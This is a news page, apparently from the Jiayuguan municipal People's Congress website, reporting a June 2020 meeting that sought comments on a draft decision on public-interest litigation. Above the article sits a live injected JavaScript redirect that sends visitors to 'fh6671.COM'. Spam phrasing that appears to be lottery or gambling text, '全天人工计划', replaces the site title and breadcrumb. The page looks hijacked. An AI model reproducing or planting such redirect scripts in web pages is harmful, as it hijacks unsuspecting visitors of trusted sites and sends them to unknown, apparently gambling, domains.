function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新立法工作  >>  立法动态  
市人大常委员会召开《关于加强公益诉讼工作的决定(草案)》征求意见座谈会
来源: 民侨内务司法工作委员会      日期: 2020-06-19      作者: 欧阳涛      点击数:

市人大常委员会召开《关于加强公益

诉讼工作的决定(草案)》征求意见座谈会

 

6月18日,市人大常委会调研组在市检察院召开《关于加强公益诉讼工作的决定(草案)》征求意见座谈会。市人大常委会党组书记、主任王进平出席会议并讲话;市人大常委会副主任韩峻峰主持会议。

会上市人大起草组负责人就《嘉峪关市人民代表大会常务委员会关于加强公益诉讼工作的决定(草案)》征求意见稿作简要说明。

市监察委员会、市中级人民法院、市公安局、市司法局、市衡轩律师事务所律师围绕《决定(草案)》的篇章结构、条款内容、文字表述等,提出修改意见建议。

市人民检察院党组书记、检察长蔡玉霞围绕《决定(草案)》提出了很好的意见建议。

最后,市人大常委会党组书记、主任王进平对大家的讨论发言给予了高度的肯定,他强调:一是要充分认识市人大出台《决定(草案)》的意义,是贯彻十八届四中全会精神、习近平总书记新时代中国特色社会主义思想,及落实以人民为中心的发展理念、发展思想的重要举措;二是出台的《决定(草案)》要出得来、用得上、用得好,不能闭门造车,学习要深入到基层;三是处理好与省上《决定》的关系,处理好我市“城乡建设与管理、环境保护、历史文化保护”三方面立法的关系,处理好监委、法院、检察机关、公安、司法行政机关的关系。